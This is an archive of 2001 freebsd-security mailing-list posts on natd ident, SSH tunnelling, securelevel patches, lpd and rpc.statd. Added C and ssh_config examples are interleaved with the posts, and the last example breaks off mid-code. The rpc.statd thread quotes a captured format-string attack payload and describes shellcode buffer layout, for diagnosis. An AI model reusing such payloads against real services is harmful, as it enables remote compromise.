From owner-freebsd-security Sun Jun 3 0:31:12 2001
Date: Sun, 3 Jun 2001 09:31:03 +0200 (CEST)
From: Marcin Jurczuk
To: freebsd-security@freebsd.org
Subject: Re: Identd via natd
In-Reply-To: <3B19D534.78A81EE2@softweyr.com>

On Sun, 3 Jun 2001, Wes Peters wrote:

> Marcin Jurczuk wrote:
> >
> > Hello all !
> > I have a NAT FreeBSD box.
> > One of our users uses the internet connection from our network to hack another
> > network's server. I can't identify him because the log from the hacked server
> > shows random identd responses from the NAT box.
> > The question is: Is there any non-random, and non-global ident support for
> > natd for FreeBSD like for ipfilter on OpenBSD (oidentd) ?
>
> /usr/ports/security/oidentd?

No, oidentd doesn't support NAT identd on the FreeBSD platform :-(
There is no ident daemon in the ports tree which can do this kind of service.

> > I can't set one ident response because there are some shell accounts and
> > they need correct response.
>
> Define what you mean by "correct response." If you think you mean "giving
> away information nobody else really needs to have," think again. Identd is
> a stupid solution to a non-problem. Run liedentd and be happy.

The correct answer is that user john has identd response "john" like normal
ident, and a user from 192.168.0.10 behind NAT has a response such as "box10",
of course only if there is no box10 account :-).

> No you don't. What you need is:
> Stupid Request -> Response that doesn't disclose private data.

Perhaps ..
Have a nice day..

================================================
Marcin 'Spock' Jurczuk
Institute of Physics
University of Bialystok
================================================

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
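The responder Marcin is asking for, as an added example that is not part of the original mail and is not natd or oidentd code: an RFC 1413 ident reply that gives the real login for the gateway's own shell users and a fixed, per-internal-host token ("box10" for 192.168.0.10) for translated connections, so a remote admin can quote the token in an abuse report without learning a username. The natd alias table and the local socket table are replaced by constructed arrays; in a real daemon the lookup would come from natd's state. Marcin's own caveat applies: the token prefix must be one no real account uses.

```c
/* Added example, not code from natd, oidentd or any FreeBSD component.
 * NAT state and local sockets are constructed in-memory tables. */
#include <stdio.h>
#include <string.h>

/* One translated connection as natd knows it: the external (alias) port
 * the gateway uses towards the remote server, the remote server's port,
 * and the internal host behind the translation. */
struct nat_entry {
    int ext_port;
    int remote_port;
    const char *internal_ip;
};

/* Constructed stand-in for natd's live alias table. */
static const struct nat_entry nat_table[] = {
    { 6193, 23, "192.168.0.10" },
    { 40212, 6667, "192.168.0.25" },
};

/* Connections owned by shell users on the gateway itself (constructed). */
struct local_entry { int lport; int rport; const char *user; };
static const struct local_entry local_table[] = {
    { 35001, 22, "john" },
};

/* 192.168.0.10 -> "box10": a stable token for the admin, no login name for
 * the remote side. Returns 0 if ip is not a dotted quad. */
int host_token(const char *ip, char *out, size_t outlen)
{
    int a, b, c, d;
    if (sscanf(ip, "%d.%d.%d.%d", &a, &b, &c, &d) != 4)
        return 0;
    snprintf(out, outlen, "box%d", d);
    return 1;
}

/* Parse one RFC 1413 request "<port on us>, <port on them>" and write the
 * reply line into out. Returns 1 for a USERID reply, 0 for an ERROR reply. */
int ident_reply(const char *request, char *out, size_t outlen)
{
    int our_port = 0, their_port = 0;
    size_t i;
    char token[32];

    if (sscanf(request, " %d , %d", &our_port, &their_port) != 2 ||
        our_port < 1 || our_port > 65535 ||
        their_port < 1 || their_port > 65535) {
        snprintf(out, outlen, "%d , %d : ERROR : INVALID-PORT\r\n",
                 our_port, their_port);
        return 0;
    }
    /* A real user on the gateway: answer with the login name, as now. */
    for (i = 0; i < sizeof local_table / sizeof local_table[0]; i++)
        if (local_table[i].lport == our_port &&
            local_table[i].rport == their_port) {
            snprintf(out, outlen, "%d , %d : USERID : UNIX : %s\r\n",
                     our_port, their_port, local_table[i].user);
            return 1;
        }
    /* A translated connection: answer with the per-host token. */
    for (i = 0; i < sizeof nat_table / sizeof nat_table[0]; i++)
        if (nat_table[i].ext_port == our_port &&
            nat_table[i].remote_port == their_port &&
            host_token(nat_table[i].internal_ip, token, sizeof token)) {
            snprintf(out, outlen, "%d , %d : USERID : UNIX : %s\r\n",
                     our_port, their_port, token);
            return 1;
        }
    snprintf(out, outlen, "%d , %d : ERROR : NO-USER\r\n", our_port, their_port);
    return 0;
}

/* Check helper: 1 if the reply to request is exactly expected. */
int ident_reply_is(const char *request, const char *expected)
{
    char reply[128];
    ident_reply(request, reply, sizeof reply);
    return strcmp(reply, expected) == 0;
}

int main(void)
{
    /* Constructed queries as a remote server would send them. */
    const char *queries[] = { "6193, 23", "35001, 22", "1, 1", "abc" };
    char reply[128];
    size_t i;
    for (i = 0; i < sizeof queries / sizeof queries[0]; i++) {
        ident_reply(queries[i], reply, sizeof reply);
        printf("Q: %-12s A: %s", queries[i], reply);
    }
    return 0;
}
```

The token answers both sides of the argument above: it discloses nothing about who is logged in (Wes's point), yet the gateway's own logs, plus the NAT table at the time, map "box10" back to one internal host (Marcin's need).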
From owner-freebsd-security Sun Jun 3 6:26:06 2001
Date: Sun, 3 Jun 2001 15:25:57 +0200
From: Patrick Atamaniuk
To: freebsd-security@FreeBSD.ORG
Subject: Re: Apache Software Foundation Server compromised, resecured. (fwd)
Message-ID: <20010603152556.B51658@mail.atabersk.de>
In-Reply-To: from brian@collab.net on Fri, Jun 01, 2001 at 08:55:16AM -0700

Brian Behlendorf(brian@collab.net)@2001.06.01 08:55:16 +0000:
> On 1 Jun 2001, Dag-Erling Smorgrav wrote:
> > You don't need passwords to run CVS against a remote repository. All
> > you need is 'CVSROOT=user@server:/path/to/repo' and 'CVS_RSH=ssh'.
>
> For those who use windows and mac GUI CVS clients, pserver's a
> requirement.
>
> IMHO, passwords are neither better nor worse, necessarily, than keys, in
> authenticating to a server. The basic difference is between "what you
> know" and "what you have". I'm as worried about people who have poor
> password management practices, as I am about people whose home or work
> machines where their private keys are may not be the most secure.

OR having the same private key on more than one machine.

The second problem is the practice of 'hopping', which then involves typing
pass[wd|phrase] on a trojaned client. Using ssh-agent or not, using an
untrusted client for performing challenge-response operations caused the
secondary attack on 3rd servers.

Host-hopping must become a banished practice. If hopping has to be done, the
untrusted client must not perform any authentication to the 3rd server.

This probably can be achieved with standard port forwarding. Assume I do have
a private key on my local workstation A for hosts B and C.

I establish a tunnel from A to B:

A> ssh -L 9999:C:22 B

and use it with

A> ssh -p 9999 localhost

Host B is only involved with authorized_keys authorizing the tunnel
establishment. All authentication between C and A does not involve the client
B decrypting anything. Though B can snoop the communication as it would on a
local LAN, it cannot directly intercept keystrokes for the passphrase or
perform AUTH_SOCK capturing.

imvho.

--
regards,
Patrick
----------------------------------------------------
Patrick Atamaniuk                 patrick@atabersk.de
----------------------------------------------------
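The tunnel described above, written out as an ssh_config fragment; this is an added example, not from the original mail, and the `Host` alias names are assumptions while A, B, C and port 9999 follow Patrick's text. It also carries the one check the two commands alone skip: `ssh -p 9999 localhost` verifies the server key under the name localhost and port 9999, so B, which terminates the forward, could answer that port with its own sshd and the client would only see an unfamiliar key to accept rather than a mismatch. `HostKeyAlias C` makes the client check the key it already knows for C. The last stanza is the same idea with `ProxyJump`, an OpenSSH option (7.3 and later) that did not exist when the mail was written: B relays the TCP stream and C authenticates A directly.

```sshconfig
# Added example (not part of the original mail). Hosts A (local
# workstation), B (hop) and C (destination) follow Patrick's text;
# the Host alias names are assumptions.

# Step 1, run once from A:  ssh tunnel-to-C
Host tunnel-to-C
    HostName B
    LocalForward 9999 C:22
    # B only needs A's key in its authorized_keys; never hand it the agent.
    ForwardAgent no

# Step 2, the real session, also from A:  ssh C-via-tunnel
Host C-via-tunnel
    HostName localhost
    Port 9999
    # Verify the key of C, not one learned for "localhost:9999": without
    # this, B could answer the forwarded port with its own sshd and the
    # client would see a new key to accept instead of a mismatch.
    HostKeyAlias C
    StrictHostKeyChecking yes
    ForwardAgent no

# One-step form, OpenSSH 7.3 or later: B relays the connection as a plain
# TCP stream, A's passphrase and agent never reach B.
Host C-via-B
    HostName C
    ProxyJump B
    ForwardAgent no
```

With `StrictHostKeyChecking yes` the second stanza refuses to connect until C's key is present in known_hosts under the name C, which is exactly the state to be in before trusting a path that runs through B.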
From owner-freebsd-security Sun Jun 3 6:33:47 2001
Date: Sun, 3 Jun 2001 15:33:48 +0200
From: Patrick Atamaniuk
To: freebsd-security@FreeBSD.ORG
Subject: Re: remounts (was: Re: adding "noschg" to ssh and friends)
Message-ID: <20010603153348.C51658@mail.atabersk.de>
References: <20010531123020.6044537B422@hub.freebsd.org> <3B1686B2.5693822B@globalstar.com>
In-Reply-To: <3B1686B2.5693822B@globalstar.com>; from crist.clark@globalstar.com on Thu, May 31, 2001 at 11:00:18AM -0700

Almost identical code I am running on a firewall with no problems; the only
difference to Crist's patch (besides no logging) is that unmount suffers from
the same problem. Beware, the diff is old, may not patch in easily.

init(8) states:

...
2 Highly secure mode - same as secure mode, plus disks may not be
  opened for writing (except by mount(2)) whether mounted or not.
  This level precludes tampering with filesystems by unmounting them,
  but also inhibits running newfs(8) while the system is multi-user.
...

so I consider unmounting at securelevel 2 not being prohibited not as a bug,
but I disagree with the statement that this would be highly secure. I don't
want to have my firewall filesystems unmounted, being read only or read write,
from somewhere else than the local console.

IMVHO the securelevel system is not generic enough; a capability system (i.e.
kernel variables) defining what is allowed and what is forbidden, with a
freeze of this definition by raising the securelevel to 1 or higher, could
help out. (Defaulting to current behaviour it most likely would not break
anything.)

To the remarks from Crist (please follow his link below):

- controlling the mount in mount(2) in the kernel is the most generic place,
  there's no way around it. kern.securelevel is imvho not granular enough to
  end all these self-made patches and feature requests.
- breaking stuff by raising the securelevel is the whole idea, I agree with
  Crist.
- Bringing fine grain and conditions into the game, this will be much work.
  Allowing transitions from insecure to secure (remount ro) would go d'accord
  with the system immutable flag behaviour, but even that should be
  controllable (before raising the securelevel actually), since there may be
  conditions where I need my /usr fs readwrite to operate correctly. (not
  speaking of /var or others)

Anyhow, here (my old) patch including unmount. The interested reader may
himself include logging of the event.

------ snip -----
--- kern/vfs_syscalls.c.orig	Thu Sep 28 23:22:42 2000
+++ kern/vfs_syscalls.c	Thu Sep 28 23:28:54 2000
@@ -120,6 +120,9 @@
 	struct nameidata nd;
 	char fstypename[MFSNAMELEN];
 
+	if (securelevel > 1)
+		return EPERM;
+
 	if (usermount == 0 && (error = suser(p)))
 		return (error);
 	/*
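Review bot: the `if (securelevel > 1) return EPERM;` placed at the top of this hunk refuses every mount(2) call at securelevel 2, with no distinction between mounting something new and a remount that only takes a filesystem to read-only, which the text of the mail itself says should stay possible; it also refuses silently, so a denied request leaves nothing in the logs (the mail leaves logging to the reader, and Crist's patch has it). Suggest inspecting the requested mount flags before refusing so that a tightening remount is still allowed, logging each denial with the path and the caller's uid, and writing `return (EPERM);` to match the `return (error);` two lines below. The unmount hunk that follows has the same silent, unlogged denial.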
@@ -410,6 +413,9 @@
 	struct mount *mp;
 	int error;
 	struct nameidata nd;
+
+	if (securelevel > 1)
+		return EPERM;
 
 	NDINIT(&nd, LOOKUP, FOLLOW | LOCKLEAF, UIO_USERSPACE,
 	    SCARG(uap, path), p);
------ snip -----

Crist Clark(crist.clark@globalstar.com)@2001.05.31 11:07:10 +0000:
> Crist Clark wrote:
> > [snip]
>
> Oops, the actual patch came shortly after,
>
> http://docs.freebsd.org/cgi/getmsg.cgi?fetch=31106+0+archive/2001/freebsd-security/20010114.freebsd-security
>

--
regards,
Patrick
----------------------------------------------------
Patrick Atamaniuk                 patrick@atabersk.de
----------------------------------------------------
//my code breaks everything including your cat.
From owner-freebsd-security Sun Jun 3 13:01:08 2001
Date: Sun, 03 Jun 2001 12:40:54 -0700
From: Jason DiCioccio
To: Darren Reed
Cc: current@FreeBSD.org, security@FreeBSD.org, current-users@netbsd.org
Subject: Re: IPFilter licence update
Message-ID: <3B1A92C6.8030301@bsd.st>
References: <200106031349.XAA01100@avalon.reed.wattle.id.au>

Darren Reed wrote:

> The licence is intended to mean that people can use (which includes modify
> or patch or tune, as seen fit) IPFilter as found within FreeBSD/NetBSD for
> whatever purpose they desire - so long as the conditions (due credit and the
> notice) are met.

So, out of curiosity, does this mean that only the slightly modified
derivatives of IPFilter found in FreeBSD and NetBSD may be modified? Or am I
reading this wrong? If not, are you just changing the interpretation of the
license? Or are you effectively granting permission for modification as stated
in your license?

Thanks in advance,
-JD-

--
Jason DiCioccio - geniusj@bsd.st - PGP Key @ http://bsd.st/~geniusj/pgpkey.asc
From owner-freebsd-security Sun Jun 3 15:42:12 2001
Date: Sun, 3 Jun 2001 15:42:15 -0700
From: "Morgan Davis"
To: "'Garance A Drosihn'"
Cc: "'Hajimu UMEMOTO'"
Subject: RE: Malformed from address
Message-ID: <003f01c0ec7e$738b3030$271978d8@cts.com>

Garance wrote:

> I also agree that administrators should
> not have to patch and recompile lpd to get the behavior they want.

Having it "work" like it used to is more of an expectation rather than a want.

> > (My vote is for a runtime flag that disables port
> > checking or allows you to specify your own acceptable range.)
>
> As a security matter, I think it should do the port checking by
> default, and the option would be to turn that checking off.

Agreed -- that was my suggestion. Do it by the book by default, but give us
the ability to break it so we can work with broken clients.

> a better (but more involved) fix would be to have two lists of
> allowed hosts.

That's an excellent idea. The system could then accommodate the sinners and
the saints in relative security.

> > truly log fatal() error messages, rather than spewing them
> > uselessly into stdout (or the socket stream).
>
> Hmm. Not sure what you mean here. At least at RPI, we DO
> get error messages in logfiles, at least for some kinds of
> errors. What do you have for 'lpr'-ish entries in your
> /etc/syslog.conf ?
> ..
> I know that we have SOME logfile entries when hosts are not in
> hosts.lpd, for instance.

If you look at all the calls to fatal() you'll see helpful troubleshooting
information that doesn't make it into the logs. The only thing you'll get in
either /var/log/messages or /var/log/lpd-errs are items such as:

Jun 1 01:27:32 venus lpd[623]: lpd startup: logging=1 dbg
Jun 1 01:27:32 venus lpd[623]: lpd startup: ready to accept requests
Jun 2 03:17:37 venus lpd[1960]: lpd startup: logging=1 dbg
Jun 2 03:17:38 venus lpd[1960]: lpd startup: ready to accept requests
Jun 2 03:23:31 venus lpd[1960]: exiting on signal 15
Jun 2 03:24:24 venus lpd[2174]: lpd startup: logging=1 dbg
Jun 2 03:24:24 venus lpd[2174]: lpd startup: ready to accept requests
Jun 2 03:25:18 venus lpd[2174]: exiting on signal 15

(I'm running with the stock syslog.conf). During this 24+ hour period, I was
generating "malformed from address" errors. That's why I ultimately had to
resort to tcpdump to see what was going on.

You can easily test it on your own system by using telnet to upset lpd and
issue the "Malformed from address". You'll see it on your telnet session
terminal, but if you look in lpd-errs or messages log, it's not in there, even
with -l and -d enabled. What other fatal() messages are sent back to the client
and are never known to the administrator?

> Maybe we turn up logging, or maybe it's
> just some other difference between RPI's lpd and freebsd's.

You've made several references to RPI and FreeBSD versions of lpd, as if
they're different. Are you not the code maintainer for FreeBSD's lpd? If not,
who is "gad"?

--Morgan
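The two changes this exchange argues for, as an added example that is not FreeBSD lpd code: a source-port check that is on by default but relaxed for hosts on a second list (Garance's "two lists of allowed hosts"), and a fatal() that puts its text into syslog as well as onto the client socket (Morgan's complaint). Host names, ports and both lists are constructed. RFC 1179 fixes the client's source port to 721-731; the range the real lpd enforced is not stated in the thread, so that strict range, and the wording of the log line, are assumptions here.

```c
/* Added example, not FreeBSD lpd code. Host lists, peers and ports are
 * constructed; the RFC 1179 port range as the "strict" rule is an assumption
 * about what "by the book" means, not a statement about lpd's source. */
#include <stdio.h>
#include <string.h>
#include <syslog.h>

#define RFC1179_PORT_LO 721
#define RFC1179_PORT_HI 731

/* The saints: must follow RFC 1179.  The sinners: known-broken clients that
 * may connect from any source port.  Both lists are constructed. */
static const char *strict_hosts[]  = { "venus.example.net", "saint.example.net" };
static const char *relaxed_hosts[] = { "winprint.example.net" };

static int in_list(const char *host, const char **list, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (strcmp(host, list[i]) == 0)
            return 1;
    return 0;
}

/* Decide whether host:port may talk to lpd. Returns 1 to accept, 0 to
 * reject; *why always points at a fixed string explaining the decision. */
int lpd_access(const char *host, int port, const char **why)
{
    if (in_list(host, relaxed_hosts, sizeof relaxed_hosts / sizeof *relaxed_hosts)) {
        *why = "accepted (relaxed host, any port)";
        return 1;
    }
    if (!in_list(host, strict_hosts, sizeof strict_hosts / sizeof *strict_hosts)) {
        *why = "host not in either allow list";
        return 0;
    }
    if (port < RFC1179_PORT_LO || port > RFC1179_PORT_HI) {
        *why = "Malformed from address";   /* the message the thread is about */
        return 0;
    }
    *why = "accepted (strict host, RFC 1179 port)";
    return 1;
}

/* Reason only, for callers that just want to log or check the decision. */
const char *lpd_access_reason(const char *host, int port)
{
    const char *why;
    lpd_access(host, port, &why);
    return why;
}

/* The one line an operator needs in lpd-errs: what happened, from where.
 * Kept apart from the syslog call so it can be inspected without a daemon. */
int format_fatal(char *out, size_t outlen, const char *host, int port, const char *msg)
{
    return snprintf(out, outlen, "lpd: %s: from %s port %d", msg, host, port);
}

/* fatal() as requested: the text still goes down the client socket (stdout
 * when lpd is started from inetd), and the same text is logged. */
void lpd_fatal(FILE *client, const char *host, int port, const char *msg)
{
    char line[256];
    format_fatal(line, sizeof line, host, port, msg);
    syslog(LOG_ERR, "%s", line);   /* fixed format: line is data, not a format */
    fprintf(client, "%s\n", line);
}

int main(void)
{
    /* Constructed connection attempts. */
    struct { const char *host; int port; } tries[] = {
        { "venus.example.net", 725 },      /* by the book */
        { "venus.example.net", 1034 },     /* broken client, strict host */
        { "winprint.example.net", 1034 },  /* same client, relaxed host */
        { "unknown.example.org", 725 },    /* not allowed at all */
    };
    size_t i;

    openlog("lpd-example", LOG_PID, LOG_LPR);
    for (i = 0; i < sizeof tries / sizeof tries[0]; i++) {
        const char *why;
        if (lpd_access(tries[i].host, tries[i].port, &why))
            printf("%s port %d: %s\n", tries[i].host, tries[i].port, why);
        else
            lpd_fatal(stdout, tries[i].host, tries[i].port, why);
    }
    closelog();
    return 0;
}
```

The default (strict) path is the secure one and the relaxed list is the explicit exception, which is the ordering Garance and Morgan agree on; every rejection, including the one Morgan could only see with tcpdump, now lands in the LPR facility with the peer that caused it.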
From owner-freebsd-security Sun Jun 3 23:30:48 2001
Date: Mon, 4 Jun 2001 01:30:42 -0500 (CDT)
From: Josh Thomas
To: freebsd-security@freebsd.org
Subject: rpc.statd attack before ipfw activated
In-Reply-To: <3B1A92C6.8030301@bsd.st>

I didn't set up ipfw for a couple of days in between setting up a small nfs
server for an in-home lan, and I got this in my system log. I realize that I
should have set up ipfw before doing this now, but any ideas what just
happened? Here is the log:

Jun 2 19:36:41 thatguys rpc.statd: invalid hostname to sm_stat: ^X\xf7\xff\xbf^
X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\
xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jun 2 19:36:41 thatguys /kernel: PM-^PM-^PM-^P-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
Jun 2 19:36:41 thatguys /kernel: PM-^PM-^PM-^P

And it cut off there. This is a home machine, and yes, I realize that a
firewall should have been running first, however, I didn't have time. I'm a
relative novice to rpc and nfs in general, so any clues would be appreciated.

Thanks,

Josh Thomas
Student Systems Analyst
Engineering Computing Center
Kansas State University
From owner-freebsd-security Mon Jun 4 0:07:24 2001
Date: Mon, 4 Jun 2001 10:06:15 +0300
From: Peter Pentchev
To: Josh Thomas
Cc: freebsd-security@freebsd.org
Subject: Re: rpc.statd attack before ipfw activated
Message-ID: <20010604100615.B31878@ringworld.oblivion.bg>
References: <3B1A92C6.8030301@bsd.st>
In-Reply-To: from jdt2101@ksu.edu on Mon, Jun 04, 2001 at 01:30:42AM -0500

On Mon, Jun 04, 2001 at 01:30:42AM -0500, Josh Thomas wrote:
> I didn't set up ipfw for a couple of days in between setting up a small
> nfs server for an in-home lan, and I got this in my system log. I realize
> that I should have set up ipfw before doing this now, but any ideas what
> just happened? Here is the log:
> Jun 2 19:36:41 thatguys rpc.statd: invalid hostname to
> sm_stat: ^X\xf7\xff\xbf^
[snip]
>
> And it cut off there. This is a home machine, and yes, I realize that a
> firewall should have been running first, however, I didn't have time. I'm
> a relative novice to rpc and nfs in general, so any clues would be
> appreciated. Thanks,

There is no known vulnerability in recent FreeBSD rpc.statd(8). However, there
*have* been known vulnerabilities in rpc.statd's of several other OS's in
relatively recent versions. What you are seeing is someone trying to exploit
such a vulnerability, and failing, causing no harm whatsoever to your system.

G'luck,
Peter

--
This sentence would be seven words long if it were six words shorter.
From owner-freebsd-security Mon Jun 4 4:06:36 2001
Date: Mon, 4 Jun 2001 13:05:53 +0200
From: Gino Thomas
To: freebsd-security@freebsd.org
Subject: Re: rpc.statd attack before ipfw activated

On Mon, 4 Jun 2001 01:30:42 -0500 (CDT), Josh Thomas wrote:

> ^X\xf7\xff\xbf^
> X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\
> xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n

Seems to be a typical shellcode string.

> ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-- cut --

I have seen this before, aren't those "NOPS" (x90)? Or are those return
addresses? A "typical" attack buffer looks like this:

nopnopnopnopshellcode/bin/shretretretretret

It seems you've been hit by an exploit which tries to get a remote shell. Do
you have dumps of the arbitrary packets?

> And it cut off there. This is a home machine, and yes, I realize that a
> firewall should have been running first, however, I didn't have time. I'm
> a relative novice to rpc and nfs in general, so any clues would be
> appreciated. Thanks,

Take a look at snort; in my case it protects from many attacks like this
(cause not many attackers are skilled enough to hack up the shellcode etc. to
fool the IDS). Also try to minimize services that run as root or execute suid
programs.

my regards
Gino Thomas
System Security Assistant

From owner-freebsd-security Mon Jun 4 4:25:19 2001
Date: Mon, 4 Jun 2001 15:25:03 +0400
From: "Nickolay A. Kritsky"
To: security@FreeBSD.ORG
Subject: Re: FYI
Message-ID: <056701c0ece9$0308d720$0600a8c0@ibmka.internethelp.ru>

Does it mean that the popper supplied with FreeBSD 3.3
(/usr/local/libexec/popper) is vulnerable too?

Best Regards
NKritsky - SysAdmin InternetHelp.Ru
http://www.internethelp.ru
e-mail: nkritsky@internethelp.ru

-----Original Message-----
From: Brett Glass
To: security@FreeBSD.ORG
Date: 2 June 2001 22:49
Subject: FYI

>Date: Fri, 1 Jun 2001 23:28:20 -0700
>From: Qpopper Support
>To: Qpopper Public List ,
>    qpopper-announce@rohan.qualcomm.com
>Cc: qpopper@qualcomm.com
>Subject: Qpopper 4.0.3 **** Fixes Buffer Overflow ****
>
>Qpopper 4.0.3 is available at
>.
>
>
>**** 4.0.3 FIXES A BUFFER OVERFLOW PRESENT IN ALL VERSIONS OF 4.0 --
>PLEASE UPGRADE IMMEDIATELY ***
>
>
>Changes from 4.0.2 to 4.0.3:
>----------------------------
> 1. Don't call SSL_shutdown unless we tried to negotiate an
>    SSL session. (As suggested by Kenneth Porter.)
> 2. Fix buffer overflow (reported by Gustavo Viscaino).
> 3. Fixed empty password treated as empty command (patch
>    submitted by Michael Smith and others).
> 4. Added patch by Carles Xavier Munyoz to fix erroneous
>    scanning for \n in getline().
> 5. Fix from Arvin Schnell for warnings on 64-bit systems.
> 6. Added patch by Clifton Royston to change error message
>    for nonauthfile and authfile tests.
> 7. Added 'uw-kludge' as synonym for 'uw-kluge'.
>
From owner-freebsd-security Mon Jun 4 5:21:30 2001
Date: Mon, 4 Jun 2001 14:21:16 +0200
From: Przemyslaw Frasunek
To: Gino Thomas
Cc: security@freebsd.org
Subject: Re: rpc.statd attack before ipfw activated
Message-ID: <20010604142116.R3509@riget.scene.pl>
In-Reply-To: from ingram@vc-protect.net on Mon, Jun 04, 2001 at 01:05:53PM +0200

On Mon, Jun 04, 2001 at 01:05:53PM +0200, Gino Thomas wrote:
> > xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n
> Seems to be a typical shellcode string.

It isn't a 'typical' shellcode string. The bug in Linux rpc.statd is a format
string vulnerability, not a buffer overflow.

> A "typical" attackbuffer looks like this: nopnopnopnopshellcode/bin/shretretretretret

Not in the case of formatting vulnerabilities.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
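Przemyslaw's distinction decides what a fix and a detector look like, so here is the defensive side as an added example (not rpc.statd code from FreeBSD, Linux or anywhere else): a classifier that separates a plain hostname from one carrying printf conversions or raw bytes, applied before the name reaches any formatting or logging code, and a logging call that passes the name as an argument to a fixed format string with non-printable bytes escaped the way the log above shows them. The sample inputs are constructed; only the %8x...%n conversion sequence is taken from Josh's log, the address and 0x90 bytes around it are made up. The rule that any conversion or %n flags the name is my choice, not a standard.

```c
/* Added example, not rpc.statd code from any system. Samples constructed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <syslog.h>

enum name_verdict {
    NAME_OK = 0,          /* letters, digits, '-' and '.' only */
    NAME_FORMAT_STRING,   /* carries printf conversions such as %x or %n */
    NAME_GARBAGE          /* empty, oversize, or bytes no hostname contains */
};

/* Count printf conversions in s: "%8x" would read a word off the stack,
 * "%n" would write one. Both are counted, %n also on its own. */
static void count_conversions(const unsigned char *s, size_t len,
                              int *conv, int *writes)
{
    size_t i, j;
    *conv = *writes = 0;
    for (i = 0; i + 1 < len; i++) {
        if (s[i] != '%')
            continue;
        j = i + 1;
        while (j < len && (isdigit(s[j]) || s[j] == '.' || s[j] == '-'))
            j++;                                  /* width / precision */
        while (j < len && (s[j] == 'h' || s[j] == 'l'))
            j++;                                  /* length modifier */
        if (j < len && s[j] != '\0' && strchr("diouxXnspc", s[j]) != NULL) {
            (*conv)++;
            if (s[j] == 'n')
                (*writes)++;
            i = j;
        }
    }
}

/* Verdict for a raw hostname of len bytes (may hold NULs and high bytes). */
enum name_verdict classify_hostname(const unsigned char *s, size_t len)
{
    size_t i;
    int conv, writes;

    if (len == 0 || len > 255)
        return NAME_GARBAGE;
    for (i = 0; i < len; i++)
        if (!(isalnum(s[i]) || s[i] == '-' || s[i] == '.'))
            break;
    if (i == len)
        return NAME_OK;
    count_conversions(s, len, &conv, &writes);
    return (conv > 0 || writes > 0) ? NAME_FORMAT_STRING : NAME_GARBAGE;
}

/* Escape for the log as the syslog line above shows it: printable ASCII
 * as is, everything else as \xNN. Returns the number of bytes written. */
size_t escape_for_log(const unsigned char *s, size_t len, char *out, size_t outlen)
{
    size_t i, n = 0;
    for (i = 0; i < len && n + 5 < outlen; i++) {
        if (s[i] >= 0x20 && s[i] < 0x7f && s[i] != '\\')
            out[n++] = (char)s[i];
        else
            n += (size_t)snprintf(out + n, outlen - n, "\\x%02x", s[i]);
    }
    out[n] = '\0';
    return n;
}

/* The hardened call: the hostname is always an argument, never the format.
 * syslog(LOG_ERR, name) with user-controlled name is the vulnerable form. */
void log_bad_hostname(const unsigned char *s, size_t len)
{
    char esc[1024];
    escape_for_log(s, len, esc, sizeof esc);
    syslog(LOG_ERR, "invalid hostname to sm_stat: %s", esc);
}

/* Check helper: 1 if escaping s yields exactly expected. */
int escapes_to(const unsigned char *s, size_t len, const char *expected)
{
    char esc[1024];
    escape_for_log(s, len, esc, sizeof esc);
    return strcmp(esc, expected) == 0;
}

int main(void)
{
    static const char *names[] = { "ok", "format-string", "garbage" };
    /* Constructed samples: a legitimate client and a payload shaped like the log. */
    static const unsigned char good[] = "nfsclient.example.net";
    static const unsigned char fmt[] =
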